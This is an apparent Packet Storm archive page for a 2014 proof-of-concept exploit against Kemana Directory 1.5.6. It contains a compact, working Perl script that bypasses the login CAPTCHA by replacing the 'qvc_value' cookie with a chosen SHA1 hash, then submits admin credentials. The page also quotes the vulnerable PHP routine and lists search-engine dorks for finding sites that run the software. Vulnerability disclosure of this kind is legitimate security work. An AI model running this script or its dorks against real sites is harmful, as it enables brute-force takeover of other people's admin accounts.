what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Kemana Directory 1.5.6 CAPTCHA Bypass

Kemana Directory 1.5.6 CAPTCHA Bypass
Posted Mar 25, 2014
Authored by LiquidWorm | Site zeroscience.mk

The CAPTCHA function for Kemana Directory is prone to a security bypass vulnerability that occurs in the CAPTCHA authentication routine. The function 'qvc_init()' in '/includes/function.php' sets a cookie with a SHA1-based hash value in the Response Header which can be replaced by a random SHA1 computed hash value using Cookie Poisoning attack. Successful exploit will allow attackers to bypass the CAPTCHA-based authentication challenge and perform brute-force attacks. Version 1.5.6 is vulnerable.

tags | exploit, php, bypass
SHA-256 | 0bbff6971475a515bf53c4adad31d393da5d381a7dab0bd0af11b3b1eca540c9

Kemana Directory 1.5.6 CAPTCHA Bypass

Change Mirror Download
#!C:\Perl64\bin\perl.exe
#
# Kemana Directory 1.5.6 (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit
#
#
# Vendor: C97net
# Product web page: http://www.c97.net
# Affected version: 1.5.6
#
# Summary: Experience the ultimate directory script solution with Kemana.
# Create your own Yahoo or Dmoz easily with Kemana. Unique Kemana's features
# including: CMS engine based on our qEngine, multiple directories support,
# user friendly administration control panel, easy to use custom fields,
# unsurpassed flexibility.
#
# Desc: The CAPTCHA function for Kemana Directory is prone to a security
# bypass vulnerability that occurs in the CAPTCHA authentication routine.
# The function 'qvc_init()' in '/includes/function.php' sets a cookie with
# a SHA1-based hash value in the Response Header which can be replaced by
# a random SHA1 computed hash value using Cookie Poisoning attack. Successful
# exploit will allow attackers to bypass the CAPTCHA-based authentication
# challenge and perform brute-force attacks.
#
#
# =============================================================================
# /includes/function.php:
# -----------------------
#
# 1774: /*------- ( QVC - VISUAL CONFIRMATION FUNCTIONS aka CAPTCHA ) ------- */
# 1775:
# 1776:
# 1777: // qVC - the simplest visual confirmation engine yet
# 1778: // use qvc_init() --> <img src="visual.php"> --> compare qvc_value() == sha1 (strtolower($user_input) )?
# 1779: // qVC uses db to communicate with visual.php, then set user cookie using sha1, then db not used!
# 1780: // $num = either 3 or 5, 3 => only 0-9, 5 => 0-F
# 1781: function qvc_init ($num = 5)
# 1782: {
# 1783: if ($num == 3)
# 1784: $value = mt_rand (100, 999);
# 1785: else
# 1786: $value = random_str (5);
# 1787: ip_config_update ('visual', $value);
# 1788: setcookie ('qvc_value', sha1 ($value), 0, '/');
# 1789: }
# 1790:
# 1791:
# 1792: // return qvc value (it's sha1'd, so be sure to compare with sha1'd value)
# 1793: function qvc_value ()
# 1794: {
# 1795: $correct_val = cookie_param ('qvc_value');
# 1796:
# 1797: // block browser BACK
# 1798: qvc_init ();
# 1799: return $correct_val;
# 1800: }
# =============================================================================
#
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
# Apache/2.4.7 (Win32)
# PHP/5.5.6
# MySQL 5.6.14
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2014-5175
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5175.php
#
#
# Dork #1: intitle:powered by c97.net
# Dork #2: intitle:powered by qEngine
# Dork #3: intitle:powered by Kemana.c97.net
# Dork #4: intitle:powered by Cart2.c97.net
#
#
# 08.03.2014
#


use LWP::UserAgent;use HTTP::Cookies;use HTTP::Request::Common;use Digest::SHA;info();#2014-03
$url="http://localhost/kemana/admin/login.php";$domain="localhost.local";$juzer="admin";$pass=
"admin";$cookie_jar=HTTP::Cookies->new();$ua=LWP::UserAgent->new;$ua->cookie_jar($cookie_jar);
print" [*] Sending request.\n";sleep(1);$request=GET $url;$response=$ua->request($request);#$_
print" [*] Reading cookie from Response Headers.\n";$cookie_jar->extract_cookies($response);#1
print" [*] ".$cookie_jar->as_string();sleep(1);$kuki=$cookie_jar->as_string;($regexp)=$kuki#].
=~/qvc_value=(.*?);/;print" [*] Got CAPTCHA: ".$regexp."\n";$sha=Digest::SHA->new();$data=#(";
"joxypoxy";$sha->add($data);$digest=$sha->hexdigest;print" [*] Poisoning with: ".$digest."\n";
$cookie_jar->set_cookie(0,'qvc_value',$digest,'/',$domain);print" [*] ".$cookie_jar->as_string
;sleep(1);print" [*] Sending login credentials.\n";$postche=$ua->request(POST $url,[user_id=>$
juzer,user_passwd=>$pass,visual=>$data]);print"\n";$check=$postche->as_string;if($check=~#get;
"HTTP/1.1 302 Found"){print" [*] CAPTCHA bypassed!\n";}else{print" [!] Didn\'t work.\n";}sub#\
info(){print"
+-----------------------------------------------------+
| |
| Kemana Directory CAPTCHA Bypass PoC Exploit |
| |
| ID: ZSL-2014-5175 |
| |
+-----------------------------------------------------+
\n\n";}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close